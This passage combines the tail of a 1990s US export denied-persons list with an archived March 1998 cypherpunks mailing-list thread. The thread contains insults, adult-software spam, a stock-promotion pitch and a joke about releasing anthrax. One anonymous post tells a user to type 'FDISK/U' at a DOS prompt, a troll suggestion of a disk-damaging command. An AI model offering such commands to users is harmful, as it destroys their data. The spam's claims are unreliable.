of lading, or other export control document relating to an export or
reexport
of commodities or technical data by, to, or for another person then
subject to
an order revoking or denying his export privileges or then excluded from
practice before the Bureau of Export Administration, or

(2) Order, buy, receive, use, sell, deliver, store, dispose of,
forward, transport, finance, or otherwise service or participate;

(i) in any transaction which may involve any commodity or
technical data exported or to be exported from the United States.

(ii) in any reexport thereof, or

(iii) in any other transaction which is subject to the Export
Administration Regulations, if the person denied export privileges may
obtain any benefit from or have any interest in, directly or indirectly,
any of these transactions.

(3) A denial order applies not only to the persons or
firms named in the order, but may also, after notice and opportunity for
comment, be made applicable to other persons with whom the respondent(s)
may then or thereafter be related by ownership, control, position of
responsibility, affiliation, or other connection in the conduct of trade
or related services. (See Section 788.3(b) of the Export Administration
Regulations (15 CRF 788.3(b))).

(4)  Some denial orders have different restrictions than those noted
above.
Summaries of the export privileges that each order denies are printed in
the column headed "Export Privileges Affected".  The exact scope of the
denial is set forth in the applicable Federal Register Notice(s).

If you have questions about the scope of a particular denial order, you
may
contact the Office of Enforcement Support, U.S. Department of Commerce,
Room
4065, 14th Street and Constitution Ave., N.W., Washington, D.C. 20230, 
Telephone (202) 482 4255, Fax (202) 482-0971.
 
                                                                 Federal
Name and Address   Effective   Expiration    Export Privileges  
Register
                     Date         Date          Affected        
Citation


Abelairas,          6/5/95      6/5/05        General           60 F.R.
31140
Amancio J.                                    and
validated                   
a.k.a. Gonzalez,                              licenses, all 
Jesus                                         commodities,
6486 S.W. 9th                                 any destination,
Miami, Florida                                also exports
33144                                         to Canada
and d.b.a
Estrella Del 
Caribe Import 
and Export Inc.,
5529 S.W. 9th Street
Miami, Florida 
33144


Ace, Ian            8/8/97     8/8/17        Standard         62 F.R.
43503    
                                                                
8/14/97   
with addresses at

4 Mimosa Way
Pinelands
South Africa

A. Rosenthal (PTY) Ltd.
P.O. Box 3721
13 Loop Street
Cape Town
South Africa

  and

A. Rosenthal (PTY) Ltd.
P.O. Box 44198
65 7th Street
Denmyr Building
2104 Linden
South Africa

ADT Analog and       9/10/81    Indefinite   General            46 F.R.
46154
 Digital Technik,                            and validated        
9/17/81
8019 Niederseeon,                            licenses, all       46 F.R.
19290
 House 21,                                   commodities,         
3/30/81
Federal Republic                             any destination,
 of Germany                                  also exports
                                             to Canada.
                                             See: Bruchausen,
                                                  Werner J.



Aeriotechnics         4/11/83  5/31/01       General            47 F.R.
18403
 (Pte) Ltd.                                  and validated        
4/29/82
 and Claypro                                 licenses, all      48 F.R.
16527
 (Pte) Ltd.                                  commodities,         
4/18/83
Suite 606,                                   any destination,
 6th Floor                                   also exports
Colombo Court                                to Canada.
and 4E                                       See: Kwik, Richard
 Dayson Road
Singapore
Agnese, Andree         7/11/85 Indefinite    General            50 F.R.
29244
22 Rue du                                    and validated        
7/18/85
 11 November 1918                            licenses, all
Pantin                                       commodities,
France                                       any destination,
                                             also exports
                                             to Canada.
                                             See: Agnese,
                                                  Rodolphe

Agnese, Helene        7/11/85  Indefinite    General            50 F.R.
29245
37 Rue de                                    and validated        
7/18/85
 la Quintinie                                licenses, all
Paris 75015                                  commodities,
France                                       any destination,
                                             also exports
                                             to Canada.
                                             See: Agnese,
                                                  Rodolphe

Agnese, Rodolphe      3/15/90  3/15/00       General            55 F.R.
10641
 individually and                            and validated        
3/22/90
 d/b/a Development                           licenses, all
 Engineering                                 commodities,
 and Electronics                             any destination,
37 Rue de                                    also exports
 la Quintinie                                to Canada.
75010 Paris
France

Agnese, Saba          7/11/85  Indefinite    General            50 F.R.
29244
 a/k/a Saba Ambaye                           and validated        
7/18/85
37 Rue de                                    licenses, all
 la Quintinie                                commodities,
Paris 75015                                  any destination,
France                                       also exports
                                             to Canada.
                                             See: Agnese,
                                                  Rodolphe


Alex Goh              9/10/93  9/10/13       See: Goh,          58 F.R.
48821
                                                  Sian Lake       
9/20/93

Ali Reza              11/9/93  7/26/99       General            58 F.R.
60842
 Foyuzi Yousefi                              and validated        
11/18/93
P.O. Box 1341                                licenses, all
 and                                         commodities,
38 Firouzkh                                  any destination,
Tajresh,                                     also exports
Tehran, Iran                                 to Canada.


Alkadi, Essam         2/20/98   2/20/01      Standard            63 F.R.
10188
P.O. Box 201                                                       
3/4/98
Dammam 31411
Saudi Arabia

Al-Kadi. Essam       2/20/98   2/20/01       Standard            63 F.R.
10188 
P.O. Box 201                                                        
3/4/98
Dammam 31411
Saudi Arabia

 

Almori, Robert        10/8/87  Indefinite    General            52 F.R.
38495
80-82 Rue                                    and validated        
10/16/87
 Saint Dominique                             licenses, all
Paris 7, France                              commodities,
                                             any destination,
                                             also exports
                                             to Canada.

Ambaye, Saba          7/11/85  Indefinite    General            50 F.R.
29244
a/k/a Saba Agnese                            and validated        
7/18/85
37 Rue de                                    licenses, all
 la Quintinie                                commodities,
Paris 75015,                                 any destination,
 France                                      also exports
                                             to Canada.
                                             See: Agnese,
                                                  Rodolphe


American              4/23/90  4/23/05       See: Tai,          55 F.R.
18147
Semiconductor,                                    Philip T.J.     
5/1/90
Inc.
Los Gatos,
California

American              6/26/95  6/26/05       General            60 F.R.
34504
Technology Trading                           and validated         
7/3/95
Group                                        licenses, all
44 Montgomery St.                            commodities,
Suite 500                                    any destination,
San Francisco,                               also exports
California  94104                            to Canada.   


Amiri, Reza           9/25/93  9/25/13       General            56 F.R.
58552
Panjtan                                      and validated      11/20/91
and
a/k/a                                        licenses, all      57 F.R.
21057
 Amiri, Ray                                  commodities,       5/18/92
and
individually                                 any destination,   57 F.R.
24242
 with an address                             also exports       6/8/92
and
 at:                                         to Canada.         57 F.R.
57155
13165                                                           12/3/92
and
 E. Essex Dr.                                                   58 F.R.
31361
Cerritos,                                                       6/2/93
and
 California                                                     58 F.R.
51610
and d/b/a                                                       10/4/93
Ray Amiri                                                       60 F.R.
8221
Computer                                                        
2/13/95    
Consultants
 now a/k/a CCC Inc.
with addresses at:
and
Heinrichstrasse
 9-11
D-6000 Frankfurt 1,
 Germany
and
c/o Pars Hafezeh
Mirdamad Avenue,
Mohsseni Square,
Farnaz Street
Tehran, Iran

Annexfield, Ltd.      12/14/84 Indefinite    General            49 F.R.
49666
152 Budbrooke Rd.                            and validated        
12/21/84
Warwick,                                     licenses, all
 United Kingdom                              commodities,
                                             any destination,
                                             also exports to
                                             Canada
                                             See: O'Hara,
                                                  Daniel J.

Appelberg             6/19/89  6/19/04       See: Appelberg,    54 F.R.
26816
 Financial                                        Lennart         
6/26/89
 Services
Saltajobaden,
 Sweden

Appelberg,            6/19/89  6/19/04       General            54 F.R.
26816
 Lennart (Lennert)                           and validated        
6/26/89
 individually                                licenses, all
 and d/b/a                                   commodities,
Appelberg                                    any destination,
 Financial                                   also exports
 Services                                    to Canada.
Filip
 Manssonsvag 1,
S-13300
 Saltajobaden, Sweden

Applied Systems       12/14/84  Indefinite   General            49 F.R.
49666
 Methods                                     and validated        
12/21/84
and Technology                               licenses, all
 (ASMAT)                                     commodities,
Rochford, Essex                              any destination,
United Kingdom                               also exports
                                             to Canada.
                                             See: O'Hara,
                                                  Daniel J.



ATC Lab               12/5/89  12/5/99       See: Schmidt,      54 F.R.
51048
 Electronic                                       A.S.S.          
12/12/89
 Service,
Segelflygsgatan 35,
122 52 Enskede,
 Sweden

Attia, Ben H.          10/30/97  10/30/12    
Standard                       
 aka Attia, Adnan
1614 Nine Island Boulevard
Miami Beach, FL 33134
  dba General Polyphase, Inc.
15 rue de Kamel Attaturk
1001 Tunis, Tunisia

Avomair Ltd.          12/14/84 Indefinite    General            49 F.R.
49666
a/k/a                                        and validated        
12/21/84
 Microcircuit                                licenses, all
 Technology                                  commodities,
3 Featherby Way                              any destination,
Purdey's                                     also exports
 Industrial                                  to Canada.
 Estate                                      See: O'Hara,
Rochford,                                         Daniel J.
 Essex,
 United Kingdom

Barbarits, Bruno      5/3/88   5/3/08        General            53 F.R.
16441
 individually                                and validated        
5/9/88
 and d/b/a                                   licenses, all
Cosmotrans AG                                commodities,
 a/k/a                                       any destination,
 Cosmotrans Ltd.                             also exports
P.O. Box 30978                               to Canada
Fracht West                                  See: Wirth, Hans
 Building
Office 274
 CH 8058
Zurich,
 Switzerland
 and
Cosmotrans
 USA, Inc.
JFK International
 Airport
Jamaica, New York


Behrmann,             1/23/92  5/10/00       General            57 F.R.
3613
 Symone Morris                               and validated        
1/30/92
11 Goldfinch Ct.,                            licenses, all
 #505                                        commodities,
Toronto, Canada                              any destination,
                                             also exports
                                             to Canada.

Belgium               3/5/91   3/5/01        See: Sanders,      56 F.R.
10537
 Trading                                          Marcel          
3/13/91
 Company
Lokeren S.A.
Sijpstratt 6 9101
Lokeren, Belgium



Berg, H. Leonard      5/12/94  1/29/02       General            59 F.R.
27531
750 Kappock Street                           and validated        
5/27/94
Apartment 103                                licenses, all
Bronx, New York                              commodities,
 and                                         any destination,
at the time the                              also exports 
order was issued                             to Canada
incarcerated at:
U.S. Bureau
 of Prisons
Low Security
 Correctional
 Institution-Allenwood
White Deer, Pennsylvania


Beta Computer        6/13/95   6/13/05      General             60 F.R.
32300
Trading Pte.                                and validated         
6/21/95
Limited                                     licenses, all
One Rockor Canal                            commodities,
Road                                        any destination,
Sim Lin Square                              also exports
# 06-67                                     to Canada
Singapore, 0718                             (See Waldemar,
                                            Znamierowski
                                            and
                                            Prandecki, Paul     


Bin Wu                9/7/93   9/7/03       See: Wu, Bin       59 F.R.
47302
Virginia Beach,                                                   
9/15/94
 Virginia

    
Bose, Sidhartha       6/16/95 6/16/05        General           60 F.R.
32940 
a/k/a/ Dr. Bose                              and validated        
6/26/95
individually and                             licenses, all
d.b.a.                                       commodities,
Perfect Technologies,                        any destination,
LTD.                                         also exports 
212 Golders                                  to Canada   
Green Road
London, NW11 9BY
England
and
Ragunathan,
Thirunavkkarasu
individually and 
d.b.a.
W.K. Agencies
and as
Computer Focus
Services PTE. LTD.
with an address at
18 Jalan Kechil, #06-22
Eastern Mansion
Singapore 1543


Bose, Dr.               6/16/95  6/16/05     See Bose, Sidhartha  60
F.R. 32940
                                                                     
6/26/95
 
Brandstetter, Herbert 6/15/87  6/15/07       General            52 F.R.
23325
 c/o Scan Trade                              and validated        
6/19/87
 Handelsgesellschaft                         licenses, all
 m.b.H.                                      commodities,
Wiednerhauptstrasse 135                      any destination,
A-1050 Vienna,                               also exports
 Austria                                     to Canada.

Brero, Mario          6/26/95  6/26/00       General            60 F.R.
34505
Apt. 87                                      and validated         
7/3/95 
Route de Bougy 1170                          licenses, all
Aubonne, Vaud                                commodities,
Switzerland                                  any destination,
                                             also exports
                                             to Canada.

Brownhill, David      9/11/95  10/6/03       General            60 F.R.
48961
13 Robin Road                                and validated        
9/21/95
Northcliff Ext. 12                           licenses, all
Johannesburg, South Africa                   commodities,
                                             any destination,
                                             also exports
                                             to Canada.

Bruchhausen,          3/24/81  Indefinite    General            46 F.R.
19290
 Werner J.                                   and validated        
3/30/81
D8019 Niederseeon                            licenses, all
Federal Republic                             commodities,
 of Germany                                  any destination,
                                             also exports
                                             to Canada.

Burger, Peter         3/25/93  3/25/13       General            58 F.R.
18368
 individually  and                           and validated        
4/9/93
 as agent for                                licenses, all
Helling KG                                   commodities,
54 Sylvesteralle                             any destination,
 22000                                       also exports
Hamburg 54,                                  to Canada.
 Germany
 and
Int'l. Business
 Connections
11 rue Aldringen
1-2960 Luxembourg,
 Luxembourg

Butcher, Brian A.     3/21/86  3/21/06       General            51 F.R.
10418
a/k/a                                        and validated        
3/26/86
Brian A.                                     licenses, all
 Moller-Butcher                              commodities,
 c/o Contel Equipment                        any destination,
5 Bear Court                                 also exports
Danshill East                                to Canada.
 Industrial Estate                           See: M.E.S.
Basingstroke,                                    Equipment, Inc.
 Hampshire
England

Caesar                12/19/90 12/19/05      General            55 F.R.
53016
 Electronics, Inc.                           and validated        
12/26/90
40C, Corbin Avenue                           licenses, all
Bayshore, New York                           commodities,
                                             any destination,
                                             also exports
                                             to Canada


CAE Services          5/29/91  5/29/11       General            56 F.R.
25654
Lowengasse 2A                                and validated        
6/5/91
A-1030 Vienna,                               licenses, all
 Austria                                     commodities,
                                             any destination,
                                             also exports
                                             to Canada.
                                             See: Kovar,
                                                  Alexander

Callaghan,            1/23/92  7/20/00       General            57 F.R.
3614
 Maryanne E.                                 and validated        
1/30/92
39 Congress St.                              licenses, all
Warwick, Rhode Island                        commodities,
                                             any destination,
                                             also exports
                                             to Canada.

Carlson, Paul C.      3/5/85   3/5/00        General            50 F.R.
9699
P.O. Box 3125                                and validated        
3/11/85
Brockton,                                    licenses, all      50 F.R.
18281
 Massachusetts                               commodities,         
4/30/85
 and                                         any destination,
87 Springhill Avenue                         also exports
Bridgewater,                                 to Canada.
 Massachusetts                               See: Contel
                                                  Equipment

CCC Inc.              9/25/93  9/25/13       See: Amiri, Reza   57 F.R.
57155
Frankfurt, Germany                                               
12/3/92 and
 c/o Pars                                                       58 F.R.
31361
 Hafezeh                                                          
6/2/93 and
Tehran, Iran                                                    58 F.R.
51610
                                                                 
10/4/93 and
                                                                60 F.R.
8221
                                                                   
2/13/95

Chan, Anthony         12/6/84  Indefinite    General            49 F.R.
48591
a/k/a                                        and validated        
12/13/84
Chan Sum-Tai Anthony                         licenses, all
c/o Shuttle                                  commodities,
 Long Co., Ltd.                              any destination,
Ka Wah Bank                                  also exports
 Center Building                             to Canada.
19th Floor                                   See: Wysh Data
232 Des Voeux Road                                Systems, Ltd.
Hong Kong Central

Chan Sum-Tai Anthony  12/6/84  Indefinite    See: Wysh Data     49 F.R.
48591
a/k/a                                             Systems, Ltd.   
12/13/84
 Anthony Chan
 c/o Shuttle
 Long Co. Ltd.
Ka Wah Bank
 Center Building
19th Floor
235 Des Voeux Road
Hong Kong Central

Chemco                8/7/89   8/26/98       See: Walaschek,    54 F.R.
8582
Seigburger                                        Peter;          
3/1/89
 Strasse 223                                      Colimex;      54 F.R.
33253
5000 Cologne 21,                                  Far-Trade      8/14/89
and
Federal Republic                                  Pharma-       56 F.R.
57875
 of Germany                                       Vertrieb        
11/14/91
                                                  GmbH


Chua Tok Peng         9/10/93  9/10/13       See: Tok Peng      58 F.R.
48821
                                                  Chua            
9/20/93





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sat, 14 Mar 1998 23:33:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: get me off/ME TOO!
Message-ID: <199803150655.HAA05046@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Dumbass, if you didn't have the brain cells to understand what this list is about, don't play with your mommy's computer and e-mail account.  Open a dos prompt and type "FDISK/U" and all your troubles will be over. 
 (what a fucked up band name)

[SNIP]
>Me too.  Take me off of your stinkin' list.
>
>Stan and the Sequencers
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sun, 15 Mar 1998 00:23:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New Website is up!!
Message-ID: <199803150745.IAA11699@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Considering the one-line content of the Web page, this appears
to have been a troll, perhaps aimed at gathering an instant
snapshot database of IP addresses/domains/reverse lookups of
people with an interest in crypto.

Don't go there. 

'Scuse me, someone's knocking at my door...
NO CARRIER

----- Original Message -----
To:               cypherpunks@toad.com, coderpunks@toad.com, cryptography@c2.net
Date sent:        	Sat, 14 Mar 1998 10:17:45 -0700
From:             "Jared" <cutey-jared@mailcity.com>
Copies to:        cypherpunks-announce@toad.com
Subject:          New Website is up!!
Organization:     MailCity  (http://www.mailcity.com:80)
Send reply to:    "Jared" <cutey-jared@mailcity.com>

New Web page up at HTTP://WWW.INSTANTWEB.COM/~SALEM/

CHECK IT OUT!! 


THANKS!!


   -CypherPunks 



Get your FREE, private e-mail
account at http://www.mailcity.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 15 Mar 1998 01:44:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Killing Stan the Right Way
Message-ID: <199803150944.KAA24525@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
> When you have been on the list longer, and when you go back and read the
> messages from the early years of the list, you will understand that it has
> never been the "Cypherpunk Way" to do the work others can do for themselves.

That's right. After glancing through some of the early posts to the
cypherpunks list one realizes that many of them had to walk ten miles
to get to a computer--always uphill and often in a blinding snowstorm.

That was back in the days when Americans still knew how to make a
big, high-powered car, but cypherpunks didn't use them to get to
their computers because they weren't namby-pamby momma's boys like
those godless commie A(h)OLs who get their peckers hammered on the
cypherpunks list and then complain because they can't get off.

Has anyone seen my shoes? I can't find my shoes...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HappyHacker <coderpunks@toad.com>
Date: Sun, 15 Mar 1998 11:55:52 -0800 (PST)
To: PNYTRO@worldnet.att.net
Subject: Webpage just recreated...
Message-ID: <350B43C500000747@mail.uep.com>
MIME-Version: 1.0
Content-Type: text/plain


hello everyone, I am happyhacker.
i sent you all an email yesterday
about my new site being up at HTTP://WWW.INSTANTWEB.COM/~salem/
and some of you replied about it not being up!
Well, it is NOW up! so please go and enjoy it! 

thanks!!

                             HappyHacker
                                 CypherPunks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: buzzreg@central.cnet.com
Date: Sun, 15 Mar 1998 14:41:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Welcome to Builder buzz!
Message-ID: <199803152241.OAA23425@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome, cypherpunks.

You have registered as a provisional user for Builder Buzz. To become a full
member, please email the following member code line back to us, so we can
confirm your email address. With most email programs, you can simply reply to
this message. (If your email program doesn't include the previous message in
its replies, you may need to cut and paste the member code line into the reply
message.)

   MEMBER CODE: 52ce L3N9gKa0 

Thank you for joining us, and we look forward to having you visit often and
participate completely in the Builder Buzz conversations!

Regards,
Dan Shafer
master builder and Builder buzz host




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WebChat Broadcasting System <validate@wbs.net>
Date: Sun, 15 Mar 1998 14:46:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Validation Code for WBS Access (cypherpunks, 46910009)
Message-ID: <199803152246.OAA20806@webchat1.wbs.net>
MIME-Version: 1.0
Content-Type: text/plain


THANKS FOR JOINING US, cypherpunks!

For full access to WBS using this handle you must validate your account.
To do so, please complete either of the following two options:

< Option #1 >  Reply to this email without altering the subject line.

This WILL NOT WORK if the subject line of your reply email is altered
in any way.  Some email serving software changes the subject line
automatically. If you are unsure whether yours does or does not,
follow the validation instructions in option #2.

< Option #2 > Go to the WBS Validation Page at
< http://wbs.net/validate.html > and enter
your account information exactly as shown below.

Handle:  cypherpunks
Password: cypherpunks
Validation #: 46910009

PASSWORDS ARE CASE SENSITIVE (e.g. if your password is "bob",
entering "BOB" in any password field on WBS will not work)

If you've decided you don't want this handle,
you can delete it by doing the following:

Go to the WBS Identity, User Editing at
< http://wbs.net/cgi-bin/user_edit.cgi >
Select "delete one of your handles" , then scroll down
and enter the handle and password exactly as shown below
and click "login".
Repeat on next page and click "delete".

Handle:  cypherpunks
Password:  cypherpunks

Thanks for being a part of the greatest community on earth!

By validating your account you acknowledge having read the WBS system
rules at < http://wbs.net/wbs/rules.html > and agree to abide by them.

If you do not believe you registered this handle on WBS, someone may
have accidentally entered your email address - or - someone may be
using your email address without your permission.

Registration to WBS is free and harmless and unless you follow the
directions above to validate the account, it will remain inactive and
unusable.  Why don't ya check us out?  < http://wbs.net >




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <kevlar@smartlink.net>
Date: Sun, 15 Mar 1998 16:12:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Welcome to Builder buzz!
In-Reply-To: <199803152241.OAA23425@toad.com>
Message-ID: <3.0.5.32.19980315161152.007b4780@mail.smartlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone tried this out yet? Is it some lame scam to get alot of e-mail
addresses? The lack of information about what the hell "Builder Buzz" makes
me wonder...


At 02:37 PM 3/15/98, you wrote:
>Welcome, cypherpunks.
>
>You have registered as a provisional user for Builder Buzz. To become a full
>member, please email the following member code line back to us, so we can
>confirm your email address. With most email programs, you can simply reply to
>this message. (If your email program doesn't include the previous message in
>its replies, you may need to cut and paste the member code line into the
reply
>message.)
>
>   MEMBER CODE: 52ce L3N9gKa0 
>
>Thank you for joining us, and we look forward to having you visit often and
>participate completely in the Builder Buzz conversations!
>
>Regards,
>Dan Shafer
>master builder and Builder buzz host
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sun, 15 Mar 1998 14:44:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: get me off/ME TOO!
Message-ID: <9af5281a.350c596f@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-15 02:54:47 EST, A real  "nobody" writes:

<< Dumbass, if you didn't have the brain cells to understand what this list is
about, don't play with your mommy's computer and e-mail account.  Open a dos
prompt and type "FDISK/U" and all your troubles will be over. >>

Look Nobody, I don't think that even ONE cypherpunk (other than yourself) is
stupid enough to think I would do it.


<<  (what a fucked up band name)  >>
   
Yes, that's why we changed it from the "Nobodies" to "Nobody's Business"  {BIG
GRIN]

Stan Rosenthal,
Nobody's Business -
http://members.aol.com/StanSquncr/home.html

PS: 'Stan and the Sequencers' opens for the Brave Combo,  March 27, at the
FabSat in Houston, Be There Or Be Square (and if you're a Liberatarian or a
Republican, you can be there AND be square!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sun, 15 Mar 1998 14:44:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Nobody's Business
Message-ID: <f3a661a.350c597a@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-15 05:10:13 EST, nobody@REPLAY.COM writes:

<< That was back in the days when Americans still knew how to make a
 big, high-powered car, but cypherpunks didn't use them to get to
 their computers because they weren't namby-pamby momma's boys like
 those godless commie A(h)OLs who get their peckers hammered on the
 cypherpunks list and then complain because they can't get off. >>

It's always easy to tell who's nerves I touch, notice the "McCarthyism" - "
... commie ... ", you guys can't hide, you're too fucking stupid.

Register and vote against Conservatives, Liberatarians and Republicans.

And Nobody, call yourself for what you are, a "DittoHead" (ie: a "stupid,
fucking moron").

Oh, but the REAL name for joker's such as "nobody"?

He's a member of the "Know-nothing" movement.  Look it up in a Dictionary.

<< Has anyone seen my shoes? I can't find my shoes... >>

That's because you're a "stupid fucking moron."

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ray Paradis" <Ray_Paradis@bigfoot.com>
Date: Sun, 15 Mar 1998 15:04:44 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: New Forum In Town
Message-ID: <001e01bd5066$a9ba7f60$890dadce@crc3.concentric.net>
MIME-Version: 1.0
Content-Type: text/plain


Grand opening of the Webmasters Club. Webmasters Club is your forum to
discuss anything and everything related to building and maintaining a web
presence.

* Notice * We are looking for moderators if you are interested please email
me.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spdrcr7719 <Spdrcr7719@aol.com>
Date: Sun, 15 Mar 1998 15:10:55 -0800 (PST)
Subject: Too Hot!!!
Message-ID: <6f8cdd6f.350c5ebf@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


   This really is a blast.  With all these movies coming out about virtual
reality, it's amazing to actually have a virtual reality program like this 
for your own computer.

   The Virtual Girlfriend and Virtual Boyfriend are artificial intelligence
programs for your IBM PC or compatible and also for MACINTOSH. You 
can watch them, talk to them, ask them questions, tell them secrets, and 
relate with them.  Watch them as you ask them to take off different clothes
and guide them through many different activities.  Watch and participate 
in the hottest sexual activities available on computer, including: several
sexual positions, using many unique toys, even bringing in multiple partners.
This is no doubt one of the most realistic, sexually stimulating computer
games available.  They will remember your name, birthday, your likes and 
your dislikes.  Every time you start the program, they say different things, 
and act differently.  Each time, they have a different personality. With the 
VGA digital graphics, the Virtual Girlfriend and Virtual Boyfriend software 
have some of the hottest, sexiest graphics out there.  You can actually 
hear their voice as they talk to you.  This is the first adult software title
that was designed for both heterosexual and homosexual people.  We
would like you to try the actual full copy out before it is put on the market
this spring. It will be sold for 1/7 of the actual price (only $7.95) until we
can get back some information on what people think of the program before
it hits the stores.  Please give it a try and write back any comments.
   Thank you.

     Virtual Girlfriend and Virtual Boyfriend are artificial intelligence 
programs, meaning they are completely interactive.  It would be just like 
if you were talking to someone.  You can actually have simple 
conversations.  Their attitudes change with the different things you say, 
so you can say things that will upset them, and then say things that will 
please them.  The more you play/talk with them, the more you learn what 
they can do, and what they like to do.  It's easy to install and instructions
are easy to follow.

         ~~~~~~~~~~~~~~~~~~~Special Offer~~~~~~~~~~~~~~~~~~~
       *Get two more new and exciting adult games for an additional $13.45*
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          Here are two of the best adult games ever!!

     This is to inform you about the new adult game that VCS Magazine
rated "The best game of "97" and gave an "Outstanding ****" (4 stars).
"The Search for Paradise is no doubt one of the greatest XXX adult games 
available".  The first game where it is as much fun as it is a turn on!
Travel the world to every continent, every country you can think of, and meet
some of the most beautiful women in existence.  These women will treat 
you like a king and obey your every command.  Any sexual wish you can 
think of,  these women know it all.  There is a certain paradise for every
guy out there, and this game will have them all.  This game uses real 
models, digital video, and digital sound to make it as realistic as possible.
You will feel like you're in the same room as the girl you're talking to!!!

     The last adult game we are going to inform you about is the newly
released "Club Celebrity X".  Imagine being in a club with some very 
beautiful, well known, ACTUAL celebrities that with skill, will be making 
you breakfast in bed the next day.  These girls you have seen on television,
magazines, and billboard ads, and now they are on your computer, begging
for action.  Each girl you will recognize and you won't believe your eyes 
when you got them in your own bedroom.  This game is hot, and once you
start playing, you won't be able to stop.  


******************************************************************************
**********
                                (((((((((LIMITED TIME ONLY))))))))
T00 H0T!!  for Virtual girlfriend.... These were too sexually graphic to
include in VG and VB.  These are some of most arousing & attractive 
models ever put in one collection.  You MUST be 18 or over to purchase 
& not easily offened.
******************************************************************************
***********

*Required: 386 or better, 4 meg ram or better, Windows 3.1 or higher 
(Win95 is fine), sound card or CD-rom are optional.  Games are given 
either on CD-rom or compressed 3.5" diskettes.  Required is VGA graphics, 
and a hard drive.  Macintosh requires at least 4 meg of ram.  They will run 
on any IBM or MACINTOSH compatible.  If you are interested and would 
like to order a copy, then you can read the mailing instructions below.  
Games come in an unmarked package and are sent out at most 4 days 
after the order is received.  You are not put on any mailing lists
whatsoever, guaranteed.  ~At your request, the programs can come with
a password protection utility that only allows the program to run when the
correct password is entered.~


To order,  please send to:             
                                        C&M PROMOTIONS
                                         6185 Magnolia Ave.
                                              Suite# 360
                                       Riverside CA, 92506
                                    Phone # 1-888-341-1643 

        Please fill out the following form and mail it to the address above.
              (Feel free to write out the order form by hand, if you wish).
      ________________________________________________________
   __________________________ (Cut here)_________________________

                   send to:             C&M Promotions
                                      6185 Magnolia Ave. #360
                                          Riverside CA, 92506


Your Name __________________________________ Date ___________

Address _____________________________________________________

City ____________________________ State ___ Zip Code ____________

Phones: Home  ___________________E-mail Address _______________

Do you use a?  IBM__  MACINTOSH __
Would you like? 3.5 Disks__ CD ROM__ 
 
(   ) Virtual
Girlfriend..............................................................$7.95
(   ) Virtual
Boyfriend.............................................................$7.95
(   ) Both Virtual Girlfriend and
Boyfriend................................$13.95
(   ) The Search for Paradise & Club Celebrity X......................$13.45
(   ) Too HOT for VG &
VB....................................................$17.50
(   ) Everything!!! The Search for Paradise, Club Celebrity X 
      and Virtual Girlfriend and Virtual
Boyfriend.......................$21.90

                                                              (ADD)
S&H.......$2.00

*money order or check*                        Amount enclosed?________


~Please indicate year of birth___________

Code:8053




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 15 Mar 1998 11:53:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: time to export RSA and demand to be prosecuted? (Re:Cypherpunks Crypto_Legal Assistance Fund) (fwd)
Message-ID: <199803151953.UAA17769@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate wrote:
> True, but since it is unethical and criminal in that it puts others in harms
> way without their prior permission it isn't reasonable. To do something like
> this really would put the part in the same boat as those they were
> attempting to defeat - a pot calling the kettle black.

Jim,
Decoded the message from your post and will tell our friends in 
Las Vegas to release the _real_ anthrax as soon as possible.
It looks like the feds are going to hang the Olympic Park bombing
on rudolph, so it seems you have nothing to worry about.

A. Nanny Mass
p.s. - I agree with the point of your post, although I didn't really
    understand it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@209.116.211.250
Date: Mon, 16 Mar 1998 04:44:31 -0800 (PST)
To: INVESTOR@209.116.211.250
Subject: 5 Times Book Value Investment NTXA
Message-ID: <199606141234.IAA02622@209.116.211.250>
MIME-Version: 1.0
Content-Type: text/plain


NTXA => National Tax and Acounting
See For your self
http://quote.yahoo.com/q?s=ntxa&d=v4

This stock holds an estimated book value of $1.24 Per share
If standards of investment apply this stock should easily hold at 5 times 
book to an expected  market valuation  of over $6 per share.
"THEN and NOW"
An investment of $100.00 in Mcdonalds in 1955 would NOW be worth over $1 million 
today.  No one knew THEN. 

See For your self
http://quote.yahoo.com/q?s=ntxa&d=v4

PRESS RELEASE INFO
============================================================
Monday January 19, 8:31 am Eastern Time
Company Press Release
http://biz.yahoo.com/bw/980119/national_t_1.html
National Tax Accounting Inc. to Merge with World Arts Centre Inc.
